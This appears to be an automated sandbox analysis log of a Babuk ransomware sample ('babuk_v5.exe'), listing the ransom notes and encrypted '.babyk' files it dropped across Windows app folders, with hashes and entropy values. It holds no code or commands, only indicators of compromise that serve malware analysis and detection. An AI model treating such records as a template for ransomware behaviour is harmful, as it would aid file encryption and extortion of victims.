                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.613187345459839
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlKKznRbhIiwpyF3eMYAFxkCxTsZcuwcsHSjxsaUCSmPQTiS2YmliLUxNvEEn:68n9hIiwcNXhTGc7JaazCxu2CL0vtn
                                                                            MD5:5B3BBEAE06FFD8CDA62352C67E62F615
                                                                            SHA1:572FC3E534426A19A3BB654149C62F3F566A1B39
                                                                            SHA-256:00E165BEA0DD57272D1748CFE4F01B4B4A2481D950279D6614B3864344775586
                                                                            SHA-512:ABD5B9A90554C09B0EAC1B2B1F26BBF19DBF4E6BAA23AACEF862EAB2ABECFAF16B01E1D9C7BA0EF0C42FB69618AA9B36012CA21723A7096F9DB430FD1FC7FA12
                                                                            Malicious:false
                                                                            Preview: .....:A.?....(..R.>...`............Pw..+...............\/.k%.K.;.f...."R.4(p...=k.....,.6!...B$...)...yW."....VJ......S...a.g....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.98244222172742
                                                                            Encrypted:false
                                                                            SSDEEP:192:9W1KLDd2L866wvJzZK1Wj4pkLAX5M/hos9JIn9XuDEan:Y12ALpv+EjNLrhogSnxuN
                                                                            MD5:6B4891321D7BC03236C885F6F792A150
                                                                            SHA1:2F47A96776D2679289C666B23D580314A75E2484
                                                                            SHA-256:0DE59FCBABE8A736E2E9E5CB3F3EC4596F08FDFAF04E57435A97ABF5B4F3A32D
                                                                            SHA-512:8DC081E6DB4D213E092C676EB24DA96AD2840D5FA7077FC8E269AB0A708A9BC433F5B58125D823126D0B99EA4F717C707A0433558CF77750B8383F34ACA0C11E
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.427703658205494
                                                                            Encrypted:false
                                                                            SSDEEP:3:tljOiN5hTFuuBF7bLIA/nYQVkIoAKBxNLb9NYRq8p9pMCZkn7ewq8LUxNvEEn:zf5u8VLIEnYQVtaHZbQ5vpMCZk7zL0vt
                                                                            MD5:FDF355884D6F91AD24A4FAD763759D60
                                                                            SHA1:A8325D5D23EABC85FEB082AF7617BC07D33A0E13
                                                                            SHA-256:2D9F855459CD1A980DC59FF1C32173F52B95F6C92650E785D4E42DFCC93EA057
                                                                            SHA-512:D3D5E029BD8B1520E583EE3441F33450897AAF48A61EABFB966CA8D645FE7960637E84066532ED08AB28230D69255022422E44B643538AF58F366FD6F95482BF
                                                                            Malicious:false
                                                                            Preview: ......i.[dk.$n.&..... ..UB q.. *.>.m?G....@.*Es.6i....c.8...8.....I..L.p...Z..2..=.{..OWP.?....e.P.E...1...m..nL...sc..j.n..[....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976717289721395
                                                                            Encrypted:false
                                                                            SSDEEP:192:9IVoyZozMmwIdKoTMDde/6vX/hrxxPtFXtQ7X4nv6:yJmB5TMR4Y/hVFXujS6
                                                                            MD5:3E68BE13B90BC105A50817D81DF3C85C
                                                                            SHA1:33BD910BB5E7C376054DF67684B6FBF7FA36F3C9
                                                                            SHA-256:CA1617C4B7703EC75EB27A0750DE4D5ABE14873B8277D5B4F2257D3D6C2FE764
                                                                            SHA-512:6C517D900AA2FCE6F55B95489401B8494962B3EB1FD14D6600CD92AED4AED72C71DF3370A379996761D8A4D881DA0E6FC591B2DA49373845C7E6ECED15B9163A
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
